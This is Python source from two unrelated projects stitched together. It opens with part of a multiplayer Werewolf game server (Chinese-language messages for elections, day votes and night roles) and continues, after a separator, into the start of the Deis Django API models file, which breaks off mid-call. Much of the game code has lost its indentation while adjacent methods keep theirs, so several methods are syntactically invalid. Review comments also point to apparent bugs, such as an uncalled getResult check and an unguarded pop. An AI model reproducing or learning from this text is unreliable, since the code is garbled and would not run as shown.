    self.allPlayer[id] = newplayer
    # Send response
    identityCode: int = getIdentityCode(self.activePlayer[id])
    # REVIEW: Print message here.
    print("The player %d get the %d identity" % (id, identityCode))
    packet: Dict[str, Any] = getBasePacket(
        newplayer.server, newplayer.client)
    packet["seat"] = id
    packet["identity"] = identityCode
    # Reply asynchronously so a slow client cannot block the accept loop.
    sendingThread: Thread = Thread(
        target=ChunckedData(-1, **packet).send, args=(self.activePlayer[id].socket,)
    )
    sendingThread.setDaemon(True)
    sendingThread.start()
def electPolice(self):
"""
Implements the game logic before day. Workflow:
- Elect for police (only the first day)
- The candidate talks in sequence (only the first day)
- The candidate could not quit the election, which is different from the offline version.
- Vote for police (only the first day)
- If a wolf explodes in the election period, the server announces the victim and switch to night immediately. The vote is delayed to the next day. Explosion of another wolf at this time will make the police does not exist.
- If there are two or more candidates get the same vote, they are required to talk in sequence again. If two or more candidates get the same vote once again, the police does not exist in the game.
# Parameter
None
# Return
The police elected. If a wolf explodes, returns None.
"""
sleep(0.05)
# Ask for election
electionCandidate: List[Tuple[int, ReceiveThread]]
electionCandidate = [
(player, self.activePlayer[player].joinElection())
for player
in sorted(self.activePlayer.keys())
]
for player, recthread in electionCandidate:
recthread.join()
candidate: List[int] = []
for player, recthread in electionCandidate:
if recthread.getResult() is not None and \
recthread.getResult().content['action'] and \
recthread.getResult().content['target']:
candidate.append(player)
current: ReceiveThread
if not candidate or len(candidate) == len(self.activePlayer):
self.broadcast(None, "本局游戏没有警长")
return
elif len(candidate) == 1:
self.broadcast(None, "警长是%d号玩家" % (candidate[0], ))
self.activePlayer[candidate[0]].police = True
return
# Candidate talk in sequence
for i in range(2):
"""
Vote for the police
Loop variable: i - only a counter
"""
self.broadcast(
None,
"警长竞选候选人:" + "号玩家、".join([str(_) for _ in candidate]) + "号玩家"
)
for player in candidate:
sleep(0.05)
current = self.activePlayer[player].speak()
current.join()
if current.getResult() is not None:
self.broadcast(
player,
"%d号玩家发言:\t" % (player,) +
current.getResult().content['content']
)
# Ask for vote
voteThread: List[ReceiveThread] = []
thread2: Optional[ReceiveThread] = None
for player in sorted(self.activePlayer.keys()):
if player in candidate:
continue # Candidate cannot vote
thread2 = self.activePlayer[player].voteForPolice()
if thread2:
voteThread.append(thread2)
for thread in voteThread:
thread.join()
del thread2
# Get the result and count the vote
vote: List[int] = []
packetContent: Dict[str, Any] = {}
for thread in voteThread:
if thread.getResult() is not None:
packetContent = thread.getResult().content
else:
continue
# REVIEW for debugging
# print(packetContent)
if packetContent['vote'] and packetContent['candidate'] in candidate:
vote.append(packetContent['candidate'])
voteResult: Dict[int, float] = mergeVotingResult(vote)
self.broadcast(
None,
"投票结果:%s" % (
"、".join(
[
"%s号玩家%.1f票" % (player, vote)
for player, vote
in zip(
voteResult.keys(),
[voteResult[_] for _ in voteResult]
)
]
),
)
)
result: List[int] = getVotingResult(voteResult)
sleep(0.05)
del voteThread
del vote
del packetContent
del voteResult
if (len(result) == 1):
self.broadcast(None, "警长是%d号玩家" % (result[0], ))
self.activePlayer[result[0]].police = True
return None
elif i == 0:
self.broadcast(
None,
"需要第二次竞选,警长候选人为%s号玩家" % "号玩家、".join(
[str(_) for _ in result]
)
)
candidate.clear()
candidate, result = result, candidate
result.clear()
self.broadcast(None, "本局游戏没有警长")
sleep(0.05)
def victimSkill(self, isExplode: bool = False):
    """
    After a player has died, the victim should take the following actions in sequence:

    - If police dies, he should decide the next police.
    - Anyone died during the day or the first night can have their last words.
    - If the guard or the king of werewolves dies and not dying from the poison, he can kill a person at this time.

    # Parameters

    - isExplode: `bool`, when the victim is killed by white werewolf's explode, no last words.
    """
    for id in self.victim:
        victim = self.allPlayer[id]
        print(victim)
        # onDead(allowLastWords, timeout): last words only on the first
        # night or during the day (day == night), never on an explosion.
        retMsg = victim.onDead(
            (self.night == 1 or self.day == self.night) and not isExplode,
            default_timeout()
        )
        # Police succession: retMsg[0] carries the dying police's choice.
        # NOTE(review): this reads retMsg[0].content directly but checks
        # retMsg[0].getResult() first — elsewhere the pattern is
        # getResult().content; confirm which object carries `content`.
        if retMsg[0] and retMsg[0].getResult() and \
                retMsg[0].content['vote'] and \
                retMsg[0].content['candidate'] in sorted(self.activePlayer.keys()):
            self.activePlayer[retMsg[0].content['candidate']].police = True
        # retMsg[1] carries the last words, broadcast to everyone.
        if retMsg[1]:
            self.broadcast(None, retMsg[1].content['content'])
        if isinstance(victim, Hunter) or isinstance(victim, KingOfWerewolves):
            # The gun/skill is only usable if not disabled (e.g. by poison).
            if (self.hunterStatus and isinstance(victim, Hunter)) \
                    or (self.kingofwolfStatus and isinstance(victim, KingOfWerewolves)):
                gunThread = victim.skill()
                gunThread.join()
                if gunThread.getResult() is not None:
                    packetContent: Dict[str, Any]
                    packetContent = gunThread.getResult().content
                else:
                    # No response: abort processing the remaining victims.
                    break
                if packetContent['action'] and packetContent['target'] in sorted(self.activePlayer.keys()):
                    self.broadcast(None, "玩家%d被玩家%d杀死"
                                   % (packetContent['target'], id))
                    self.activePlayer[
                        packetContent['target']
                    ].informDeath()
                    self.activePlayer.pop(packetContent['target'])
                    status = self.checkStatus()
                    if status != 0:
                        return status
                    # The shot victim gets last words (no further chain).
                    self.allPlayer[
                        packetContent['target']
                    ].onDead(True, default_timeout(None))
                else:
                    victim.inform("你的选择无效")
            else:
                victim.inform("你由于女巫的毒药死亡而不能开枪")
    # Remove all processed victims from the active roster.
    # NOTE(review): pop() with no default raises KeyError if a victim was
    # already removed (dayTime removes exiles before calling this) —
    # consider pop(victim, None); verify the call order.
    for victim in self.victim:
        self.activePlayer.pop(victim)
    self.victim.clear()
def dayTime(self) -> int:
"""
Implements the game logic in daytime. Workflow:
- Announce the victim
- If the king of werewolves or the hunter is killed by the wolves, ask them
- If the police exists - randomly choose a side from the police
- If the police does not exist - randomly choose a side from the victim
- If no or two players died at night - randomly choose a side from the police (if exist)
- The player talks in sequence
- If a wolf explodes, the game switch to the night at once after the wolf talks.
- Vote for the victim
- If there are same vote, players with the same vote talk again and vote again. If the same situation appears again, there will be no victim in day.
- Announce the exile
- If the exile is an idiot not voted out before, it can escape from death. But the idiot can no longer vote.
# Return
An `int` integer, value falls in `-1`, `0` and `1`
- `-1`: The game stops and the werewoles win - either villagers or skilled villagers are eliminated
- `0`: The game continues
- `1`: The game stops and the villagers win - the wolves are eliminated
"""
# ANCHOR: Implement the game logic in daytime
sleep(0.05)
self.day += 1
self.broadcast(
None,
"天亮了\n目前在场的玩家:%s号玩家" % (
"号玩家、".join([str(_) for _ in sorted(self.activePlayer.keys())])
)
)
startpoint: int = 0
exile: List[int] = []
# announce the victim and check the game status
if len(self.victim) == 0:
self.broadcast(None, "公布死讯:昨晚是平安夜")
else:
self.broadcast(None, "公布死讯:昨晚死亡的玩家是%s号玩家" %
"号玩家、".join(str(s) for s in self.victim))
# ask if the victim want to use the skill
if len(self.victim) > 0:
for id in self.victim:
self.activePlayer[id].informDeath()
self.victimSkill()
status = self.checkStatus()
if status != 0:
return status
# ask the police (if exists) to choose the talking sequence
talkSequence: List[int] = []
isClockwise: bool = True
packetContent: Dict[str, Any] = {}
policeID: int = 0
for player in sorted(self.activePlayer.keys()):
"""
Find the police
"""
if self.activePlayer[player].police:
policeID = player
startpoint = self.victim[0] \
if len(self.victim) == 1 \
else (policeID if policeID else min(self.activePlayer.keys()))
# Police choose the direction
if policeID:
police = self.activePlayer[policeID]
policeThread = police.policeSetseq()
policeThread.join()
isClockwise = policeThread.getResult().content['target'] \
if policeThread.getResult() is not None \
else True
talkSequence: List[int] = self.setSeq(startpoint, isClockwise)
exile: List[int] = []
# active player talk in sequence
policeVoteThread: Optional[ReceiveThread] = None
policeVote: Optional[int] = None
for i in range(2):
"""
Vote for the exile
Loop variable: i - only a counter
"""
for id in talkSequence:
if id not in exile:
sleep(0.05)
player = self.activePlayer[id]
current = player.speak()
current.join()
self.broadcast(
player, "%d号玩家发言:\t" % (id,) + current.getResult().content['content'])
# Ask for vote
voteThread: List[ReceiveThread] = []
for id in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[id], Idiot) and self.activePlayer[id].used:
"""
An idiot cannot vote
"""
continue
if id != policeID:
voteThread.append(self.activePlayer[id].vote())
else:
policeVoteThread = self.activePlayer[id].vote()
for thread in voteThread:
thread.join()
if policeVoteThread is not None:
policeVoteThread.join()
if policeVoteThread is not None and policeVoteThread.getResult() is not None:
packetContent = policeVoteThread.getResult().content
if packetContent['vote'] and packetContent['candidate'] in sorted(self.activePlayer.keys()):
policeVote = packetContent['candidate']
# Get the result and count the vote
vote: List[int] = []
packetContent: Dict[str, Any] = {}
for thread in voteThread:
if thread.getResult() is None:
continue
packetContent = thread.getResult().content
if packetContent['vote'] and packetContent['candidate'] in sorted(self.activePlayer.keys()):
vote.append(packetContent['candidate'])
voteResult: Dict[int, float] = mergeVotingResult(vote, policeVote)
self.broadcast(
None,
"投票结果:%s" % (
"、".join(
[
"%s号玩家%.1f票" % (player, vote)
for player, vote
in zip(
voteResult.keys(),
[voteResult[_] for _ in voteResult]
)
]
),
)
)
result: List[int] = getVotingResult(voteResult)
# REVIEW for debugging
# print(vote)
# print(result)
del voteThread
del vote
del packetContent
del voteResult
exile.clear()
if (len(result) == 1):
"""
Check the identity of the exiled. Idiot can escape from dying.
"""
if not isinstance(self.activePlayer[result[0]], Idiot) or self.activePlayer[result[0]].used:
self.broadcast(
None, "被放逐的玩家是%d号玩家" % (result[0],)
)
exile.append(result[0])
else:
self.activePlayer[result[0]].used = 1
self.broadcast(None, "%d号玩家是白痴" % (result[0],))
break
elif i == 0:
self.broadcast(
None,
"需要另一次投票,投票候选人为%s号玩家" % "号玩家、".join(
[str(_) for _ in result]
)
)
exile, result = result, exile
# announce the exile and check the game status
if len(exile) == 0:
self.broadcast(None, "没有人被放逐")
else:
del self.activePlayer[exile[0]]
self.victim.clear()
self.victim.extend(exile)
for id in self.victim:
if id in sorted(self.activePlayer.keys()):
self.activePlayer.pop(id)
status = self.checkStatus()
if status:
return status
# ask if the victim want to use the skill
while self.victim: # 极端情况可能会开两次枪
for id in self.victim:
self.allPlayer[id].informDeath()
self.victimSkill()
status = self.checkStatus()
return status
def setSeq(self, startpoint: int, clockwise: bool) -> List[int]:
    """
    Build the speaking order over the active seats.

    - startpoint: the seat id to pivot on
    - clockwise : True means clockwise, False means anti-clockwise
    - return    : seat ids in speaking order

    Equivalent formulation of the original two-bucket construction:
    rotate the sorted seat list at `startpoint`, reversing for clockwise.
    """
    order = sorted(self.activePlayer.keys())
    if startpoint in order:
        cut = order.index(startpoint)
        if clockwise:
            return list(reversed(order[cut:] + order[:cut]))
        return order[cut + 1:] + order[:cut + 1]
    # Pivot seat absent: plain descending (clockwise) or ascending order.
    return list(reversed(order)) if clockwise else list(order)
def nightTime(self):
"""
Implements the game logic at night. Workflow:
- Wolves wake up to kill a person. The server should inform a player his peers.
- The witch wakes up to kill a person or save a person
- After the witch has saved a person, it would no longer knows the victim at night
- The witch can only use a bottle of potion at night.
- The witch can only save herself in the first night.
- The predictor wakes up and check the identity of another player.
- The guard wakes up, choose to guard a player at night.
- The guard cannot guard a player in two consecutive nights.
- The hunter wakes up. The server inform the skill status. (If not killed by the witch)
"""
sleep(0.05)
self.night += 1
self.broadcast(
None,
"天黑请闭眼\n目前在场的玩家:%s号玩家" % (
"号玩家、".join([str(_) for _ in sorted(self.activePlayer.keys())])
)
)
# Parameters:
victimByWolf: int = 0
victimByWitch: int = 0
predictorTarget: int = 0
guardTarget: int = 0
# ANCHOR: Wolves wake up
# Vote for a player to kill
wolves = []
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Wolf):
wolves.append(player)
for wolf in wolves:
self.activePlayer[wolf].inform(
"目前在场的狼人:" + "号玩家、".join([str(_) for _ in wolves]) + "号玩家"
)
wolfThread: List[KillableThread] = []
sleep(0.5)
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], (Wolf, KingOfWerewolves, WhiteWerewolf)):
ret: Optional[KillableThread] = KillableThread(
self.activePlayer[player].kill, **{}
)
ret.setDaemon(True)
ret.start()
if ret is not None:
wolfThread.append(ret)
if wolfThread: # Only used for indention
temp: List[ReceiveThread] = []
for thread in wolfThread:
thread.join()
if thread.getResult():
temp.append(thread.getResult())
for thread in temp:
thread.join()
vote: List[int] = []
packetContent: Dict[str, Any] = {}
for thread in temp:
if thread.getResult() is None:
continue
packetContent = thread.getResult().content
if packetContent['action'] and packetContent['target'] in sorted(self.activePlayer.keys()):
vote.append(packetContent['target'])
result: Any = mergeVotingResult(vote)
result = getVotingResult(result)
# If there are more than 1 victim, randomly choose one
shuffle(result)
victimByWolf = result[0] if result else 0
del vote
del packetContent
del result
del temp
del wolfThread
if self.explode is not None:
self.activePlayer[self.explode].informDeath()
self.activePlayer.pop(self.explode)
self.explode = None
# ANCHOR: Predictor wake up
# The predictor ask for a player's identity
predictorThread: Optional[ReceiveThread] = None
predictor: Optional[Predictor] = None
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Predictor):
predictor = self.activePlayer[player]
predictorThread = self.activePlayer[player].skill()
if predictorThread:
predictorThread.join()
if predictor is not None and predictorThread is not None and predictorThread.getResult() is not None:
packetContent: Dict[str, Any] = predictorThread.getResult().content
if packetContent['action'] and packetContent['target'] in sorted(self.activePlayer.keys()):
predictorTarget = packetContent['target']
# Notice: the server need to send a response here, and the packet type is -3
# The 'action' field is the identity of the target.
packetContent.update(**predictor._getBasePacket())
packetContent['action'] = getIdentityCode(
self.activePlayer[predictorTarget]) >= 0
packetContent['target'] = -1024
sendingThread: Thread = Thread(
target=ChunckedData(-3, **packetContent).send,
args=(predictor.socket, ),
daemon=True
)
sendingThread.start()
del packetContent
del predictorThread
# ANCHOR: Witch wake up
# Witch can save or kill a person
witchThread: Optional[ReceiveThread] = None
witch: Optional[Witch] = None
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Witch):
witch = self.activePlayer[player]
witchThread = witch.skill(
killed=victimByWolf
)
if witchThread:
witchThread.join()
if witch is not None and witchThread is not None and witchThread.getResult() is not None:
"""
Got the response
"""
packetContent: Dict[int, Any] = witchThread.getResult().content
if packetContent['action']:
"""
If the witch takes the action
"""
if packetContent['target'] == 0 or \
not isinstance(self.activePlayer[packetContent['target']], Witch) or \
self.night == 0:
"""
The witch cannot save herself after the first night.
"""
if packetContent['target'] == 0 and witch.used % 2 == 0:
victimByWolf *= -1 # wait for guard
witch.used += 1
elif packetContent['target'] in sorted(self.activePlayer.keys()) and witch.used < 2:
victimByWitch = packetContent['target']
witch.used += 2
del packetContent
del witchThread
# ANCHOR: Guard wake up
# Guard protects a player, prevent him from dying from wolves.
guardThread: Optional[ReceiveThread] = None
guard: Optional[Guard] = None
for player in sorted(self.activePlayer.keys()):
if isinstance(self.activePlayer[player], Guard):
guard = self.activePlayer[player]
guardThread = self.activePlayer[player].skill()
if guardThread:
guardThread.join()
if guard is not None and guardThread is not None and guardThread.getResult is not None:
packetContent: dict = guardThread.getResult().content
if packetContent['action']:
if packetContent['target'] in sorted(self.activePlayer.keys()):
guardTarget = packetContent['target']
# Cannot save the same player in 2 days.
if (guardTarget != self.guardedLastNight):
victimByWolf *= -1 if guardTarget ** 2 == victimByWolf ** 2 else 1
# the situation when guard and save the same person
del packetContent
del guardThread
# ANCHOR: Hunter wake up
# The server checks the usablity of the skill
if victimByWitch in sorted(self.activePlayer.keys()):
self.hunterStatus = not isinstance(
self.activePlayer[victimByWitch], Hunter
)
self.kingofwolfStatus = not isinstance(
self.activePlayer[victimByWitch], KingOfWerewolves
)
# ANCHOR: Return the value
self.victim.clear()
if victimByWitch in sorted(self.activePlayer.keys()):
self.victim.append(victimByWitch)
if victimByWolf in sorted(self.activePlayer.keys()):
self.victim.append(victimByWolf)
shuffle(self.victim)
if self.guardedLastNight != guardTarget:
self.guardedLastNight = guardTarget
else:
self.guardedLastNight = 0
self.night += 1
def broken(self, id: int):
    """
    Process the self-explosion of the wolf in seat `id`.

    Announces the explosion to every player; a white werewolf additionally
    gets to take one player down with it. The exploding wolf itself is only
    marked in `self.explode` and removed after the next night.
    """
    # NOTE(review): assumes KingOfWerewolves / WhiteWerewolf subclass Wolf,
    # otherwise this assertion rejects their explosion — confirm in
    # abstraction.py.
    assert isinstance(self.activePlayer[id], Wolf)
    if isinstance(self.activePlayer[id], KingOfWerewolves):
        self.kingofwolfStatus = False
    sendingThreads: List[Thread] = []
    for i in self.activePlayer:
        """
        Inform all players, including the player sends the message
        """
        packetContent = self.activePlayer[i]._getBasePacket()
        packetContent["id"] = id
        # Type-9 packet announces the explosion; sent on daemon threads so
        # one slow client cannot stall the rest.
        sendingThreads.append(Thread(
            target=ChunckedData(9, **packetContent).send,
            args=(self.activePlayer[i].socket, ),
            daemon=True
        ))
    for thread in sendingThreads:
        thread.start()
    if isinstance(self.activePlayer[id], WhiteWerewolf):
        """
        Kill someone
        """
        recvThread: ReceiveThread = self.activePlayer[id].skill()
        recvThread.join()
        if recvThread.getResult() is not None:
            packetRecv = recvThread.getResult()
            if packetRecv['action'] and packetRecv['target'] in self.activePlayer:
                self.broadcast(
                    None,
                    "白狼王%d号玩家带走%d号玩家" % (id, packetRecv['target'])
                )
                self.victim.clear()
                self.victim.append(packetRecv['target'])
                # isExplode=True: the carried-off victim gets no last words.
                self.victimSkill(True)
    self.explode = id  # dies once the next nightTime() pass finishes
def launch(self):
"""
Launch the game
"""
assert self.running, "The game must be activated!"
while not self.status:
self.nightTime()
if self.day == 0:
self.electPolice()
explodeListenerv4 = socket.socket(AF_INET, SOCK_STREAM)
explodeListenerv6 = socket.socket(AF_INET6, SOCK_STREAM)
explodeListenerv4.bind((self.ipv4, self.port + 1))
explodeListenerv6.bind((self.ipv6, self.port + 1))
explodeListenerv4.listen(5)
explodeListenerv6.listen(5)
dayTimeThread = KillableThread(self.dayTime)
explodeThreadv4 = KillableThread(explodeListenerv4.accept)
explodeThreadv6 = KillableThread(explodeListenerv6.accept)
dayTimeThread.setDaemon(True)
explodeThreadv4.setDaemon(True)
explodeThreadv6.setDaemon(True)
explodeThreadv4.start()
explodeThreadv6.start()
dayTimeThread.start()
while dayTimeThread.is_alive():
"""
Listen for message
"""
if explodeThreadv4.is_alive() and explodeThreadv6.is_alive():
continue
c: socket.socket
addr: Tuple[Any]
if explodeThreadv4.is_alive() == False and explodeThreadv4.getResult():
c, addr = explodeThreadv4.getResult()
explodeThreadv6.kill()
else:
c, addr = explodeThreadv6.getResult()
explodeThreadv4.kill()
listenThread: ReceiveThread = ReceiveThread(c, 60)
listenThread.setDaemon(True)
listenThread.start()
listenThread.join()
curPacket = listenThread.getResult()
if curPacket is None:
continue
assert curPacket.type == 9
self.explode = curPacket['id']
dayTimeThread.kill()
self.broken(curPacket['id'])
c.close()
break
if explodeThreadv4.is_alive():
explodeThreadv4.kill()
if explodeThreadv6.is_alive():
explodeThreadv6.kill()
explodeListenerv4.close()
explodeListenerv6.close()
self.announceResult(self.status == 1)
self.broadcast(
None,
"本局游戏村民获胜" if self.status == 1 else "本局游戏狼人获胜"
)
for player in self.allPlayer:
self.allPlayer[player].socket.close()
class IncomingConnection(KillableThread):
    """
    Create a thread that receives a handshake package.

    `Establish` packets and `EstablishResp` packets are no longer used. The server sends the port information in this packet.
    """

    def __init__(self, connection: socket.socket, dest: Game):
        # The base KillableThread is constructed around connection.accept;
        # note run() below overrides it and loops on accept itself.
        super(IncomingConnection, self).__init__(connection.accept)
        self.socket = connection   # listening socket to accept clients on
        self.game: Game = dest     # game that newly accepted players join
        self.pending: bool = False  # True while blocked inside accept()

    def run(self):
        # Keep accepting connections until the table is full.
        while self.game.playerCount != len(self.game.activePlayer):
            # REVIEW for debugging
            # print("Listening for additional player...")
            self.pending = True
            c, addr = self.socket.accept()
            self.pending = False
            # REVIEW for debugging
            # print(c.getpeername())
            # print(c.getsockname())
            # print("Client connected")
            # Read the seat-request packet and register the player.
            self.game.addPlayer(c, _recv(c))
|
models.py | # -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import etcd
import importlib
import logging
import os
import re
import subprocess
import time
import threading
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from django_fsm import FSMField, transition
from django_fsm.signals import post_transition
from docker.utils import utils
from json_field.fields import JSONField
import requests
from rest_framework.authtoken.models import Token
from api import fields
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def log_event(app, msg, level=logging.INFO):
    """Record *msg* against *app* in both the Django log and the app's own log file."""
    line = "{}: {}".format(app.id, msg)
    logger.log(level, line)  # module-level django logger
    app.log(line)  # per-app log file on the local filesystem
def validate_app_structure(value):
    """Error if the dict values aren't ints >= 0.

    :param value: mapping of process type to requested container count
    :raises ValidationError: when a count is negative or not parseable as int
    """
    try:
        # FIX: was `value.iteritems()` with Python-2-only `except ValueError, err:`
        # syntax; `values()` + `as err` behaves identically on Python 2 and also
        # parses on Python 3. The key was never used.
        for v in value.values():
            if int(v) < 0:
                raise ValueError("Must be greater than or equal to zero")
    except ValueError as err:
        raise ValidationError(err)
def validate_comma_separated(value):
    """Error if the value doesn't look like a list of hostnames or IP addresses
    separated by commas.
    """
    allowed = r'^[a-zA-Z0-9-,\.]+$'
    if re.search(allowed, value) is None:
        raise ValidationError(
            "{} should be a comma-separated list".format(value))
def validate_domain(value):
    """Error if the domain contains unexpected characters."""
    ok = re.search(r'^[a-zA-Z0-9-\.]+$', value) is not None
    if not ok:
        raise ValidationError('"{}" contains unexpected characters'.format(value))
class AuditedModel(models.Model):
    """Add created and updated fields to a model."""

    # set once when the row is first inserted
    created = models.DateTimeField(auto_now_add=True)
    # refreshed on every save()
    updated = models.DateTimeField(auto_now=True)

    class Meta:
        """Mark :class:`AuditedModel` as abstract."""
        abstract = True
class UuidAuditedModel(AuditedModel):
    """Add a UUID primary key to an :class:`AuditedModel`."""

    # project-local UuidField from api.fields serves as the primary key
    uuid = fields.UuidField('UUID', primary_key=True)

    class Meta:
        """Mark :class:`UuidAuditedModel` as abstract."""
        abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
    """
    Application used to service requests on behalf of end-users

    Orchestrates containers through the configured scheduler backend and
    maintains a per-app log file under ``settings.DEIS_LOG_DIR``.
    """

    owner = models.ForeignKey(settings.AUTH_USER_MODEL)
    # slug doubles as log file name, registry repository and URL prefix
    id = models.SlugField(max_length=64, unique=True)
    # mapping of process type -> desired container count
    structure = JSONField(default={}, blank=True, validators=[validate_app_structure])

    class Meta:
        permissions = (('use_app', 'Can use app'),)

    def __str__(self):
        return self.id

    def _get_scheduler(self, *args, **kwargs):
        """Instantiate the scheduler backend named in settings."""
        module_name = 'scheduler.' + settings.SCHEDULER_MODULE
        mod = importlib.import_module(module_name)
        return mod.SchedulerClient(settings.SCHEDULER_TARGET,
                                   settings.SCHEDULER_AUTH,
                                   settings.SCHEDULER_OPTIONS,
                                   settings.SSH_PRIVATE_KEY)

    _scheduler = property(_get_scheduler)

    @property
    def url(self):
        # public hostname of the app under the platform domain
        return self.id + '.' + settings.DEIS_DOMAIN

    def log(self, message):
        """Logs a message to the application's log file.

        This is a workaround for how Django interacts with Python's logging module. Each app
        needs its own FileHandler instance so it can write to its own log file. That won't work in
        Django's case because logging is set up before you run the server and it disables all
        existing logging configurations.
        """
        with open(os.path.join(settings.DEIS_LOG_DIR, self.id + '.log'), 'a') as f:
            msg = "{} deis[api]: {}\n".format(time.strftime(settings.DEIS_DATETIME_FORMAT),
                                              message)
            f.write(msg.encode('utf-8'))

    def create(self, *args, **kwargs):
        """Create a new application with an initial config and release"""
        config = Config.objects.create(owner=self.owner, app=self)
        Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)

    def delete(self, *args, **kwargs):
        """Delete this application including all containers"""
        # 'run' containers are one-off and are not tracked for teardown here
        for c in self.container_set.exclude(type='run'):
            c.destroy()
        self._clean_app_logs()
        return super(App, self).delete(*args, **kwargs)

    def _clean_app_logs(self):
        """Delete application logs stored by the logger component"""
        path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log')
        if os.path.exists(path):
            os.remove(path)

    def scale(self, user, structure):  # noqa
        """Scale containers up or down to match requested structure.

        :param user: the user requesting the scale (for audit logging)
        :param structure: dict of process type -> desired container count
        :returns: True if the container set changed, False otherwise
        :raises EnvironmentError: no build, or an unknown process type
        """
        if self.release_set.latest().build is None:
            raise EnvironmentError('No build associated with this release')
        requested_structure = structure.copy()
        release = self.release_set.latest()
        # test for available process types
        available_process_types = release.build.procfile or {}
        for container_type in requested_structure.keys():
            if container_type == 'cmd':
                continue  # allow docker cmd types in case we don't have the image source
            if container_type not in available_process_types:
                raise EnvironmentError(
                    'Container type {} does not exist in application'.format(container_type))
        msg = '{} scaled containers '.format(user.username) + ' '.join(
            "{}={}".format(k, v) for k, v in requested_structure.items())
        log_event(self, msg)
        # iterate and scale by container type (web, worker, etc)
        changed = False
        to_add, to_remove = [], []
        for container_type in requested_structure.keys():
            containers = list(self.container_set.filter(type=container_type).order_by('created'))
            # increment new container nums off the most recent container
            results = self.container_set.filter(type=container_type).aggregate(Max('num'))
            container_num = (results.get('num__max') or 0) + 1
            requested = requested_structure.pop(container_type)
            diff = requested - len(containers)
            if diff == 0:
                continue
            changed = True
            # scale down: remove the most recently created containers first
            while diff < 0:
                c = containers.pop()
                to_remove.append(c)
                diff += 1
            while diff > 0:
                # create a database record
                c = Container.objects.create(owner=self.owner,
                                             app=self,
                                             release=release,
                                             type=container_type,
                                             num=container_num)
                to_add.append(c)
                container_num += 1
                diff -= 1
        if changed:
            if to_add:
                self._start_containers(to_add)
            if to_remove:
                self._destroy_containers(to_remove)
        # save new structure to the database
        vals = self.container_set.values('type').annotate(Count('pk')).order_by()
        self.structure = {v['type']: v['pk__count'] for v in vals}
        self.save()
        return changed

    def _start_containers(self, to_add):
        """Creates and starts containers via the scheduler.

        Creation failures abort the operation; start failures only warn.
        """
        create_threads = []
        start_threads = []
        for c in to_add:
            create_threads.append(threading.Thread(target=c.create))
            start_threads.append(threading.Thread(target=c.start))
        [t.start() for t in create_threads]
        [t.join() for t in create_threads]
        if set([c.state for c in to_add]) != set([Container.CREATED]):
            err = 'aborting, failed to create some containers'
            log_event(self, err, logging.ERROR)
            raise RuntimeError(err)
        [t.start() for t in start_threads]
        [t.join() for t in start_threads]
        if set([c.state for c in to_add]) != set([Container.UP]):
            err = 'warning, some containers failed to start'
            log_event(self, err, logging.WARNING)

    def _destroy_containers(self, to_destroy):
        """Destroys containers via the scheduler.

        Database rows are deleted only for containers that actually reached
        the DESTROYED state; any leftover aborts with RuntimeError.
        """
        destroy_threads = []
        for c in to_destroy:
            destroy_threads.append(threading.Thread(target=c.destroy))
        [t.start() for t in destroy_threads]
        [t.join() for t in destroy_threads]
        [c.delete() for c in to_destroy if c.state == Container.DESTROYED]
        if set([c.state for c in to_destroy]) != set([Container.DESTROYED]):
            err = 'aborting, failed to destroy some containers'
            log_event(self, err, logging.ERROR)
            raise RuntimeError(err)

    def deploy(self, user, release, initial=False):
        """Deploy a new release to this application.

        Clones every existing (non-run) container onto the new release,
        starts the clones, then destroys the old containers.
        """
        existing = self.container_set.exclude(type='run')
        new = []
        for e in existing:
            n = e.clone(release)
            n.save()
            new.append(n)
        # create new containers
        threads = []
        for c in new:
            threads.append(threading.Thread(target=c.create))
        [t.start() for t in threads]
        [t.join() for t in threads]
        # check for containers that failed to create
        if len(new) > 0 and set([c.state for c in new]) != set([Container.CREATED]):
            err = 'aborting, failed to create some containers'
            log_event(self, err, logging.ERROR)
            self._destroy_containers(new)
            raise RuntimeError(err)
        # start new containers
        threads = []
        for c in new:
            threads.append(threading.Thread(target=c.start))
        [t.start() for t in threads]
        [t.join() for t in threads]
        # check for containers that didn't come up correctly
        if len(new) > 0 and set([c.state for c in new]) != set([Container.UP]):
            # report the deploy error
            err = 'warning, some containers failed to start'
            log_event(self, err, logging.WARNING)
        # destroy old containers
        if existing:
            self._destroy_containers(existing)
        # perform default scaling if necessary
        if initial:
            self._default_scale(user, release)

    def _default_scale(self, user, release):
        """Scale to default structure based on release type"""
        # if there is no SHA, assume a docker image is being promoted
        if not release.build.sha:
            structure = {'cmd': 1}
        # if a dockerfile exists without a procfile, assume docker workflow
        elif release.build.dockerfile and not release.build.procfile:
            structure = {'cmd': 1}
        # if a procfile exists without a web entry, assume docker workflow
        elif release.build.procfile and 'web' not in release.build.procfile:
            structure = {'cmd': 1}
        # default to heroku workflow
        else:
            structure = {'web': 1}
        self.scale(user, structure)

    def logs(self):
        """Return aggregated log data for this application."""
        path = os.path.join(settings.DEIS_LOG_DIR, self.id + '.log')
        if not os.path.exists(path):
            raise EnvironmentError('Could not locate logs')
        # last LOG_LINES lines only, via tail(1)
        data = subprocess.check_output(['tail', '-n', str(settings.LOG_LINES), path])
        return data

    def run(self, user, command):
        """Run a one-off command in an ephemeral app container.

        :returns: (return_code, output) tuple from the scheduler
        :raises EnvironmentError: when SSH support or a build is missing
        """
        # FIXME: remove the need for SSH private keys by using
        # a scheduler that supports one-off admin tasks natively
        if not settings.SSH_PRIVATE_KEY:
            raise EnvironmentError('Support for admin commands is not configured')
        if self.release_set.latest().build is None:
            raise EnvironmentError('No build associated with this release to run this command')
        # TODO: add support for interactive shell
        msg = "{} runs '{}'".format(user.username, command)
        log_event(self, msg)
        c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
        # create database record for run process
        c = Container.objects.create(owner=self.owner,
                                     app=self,
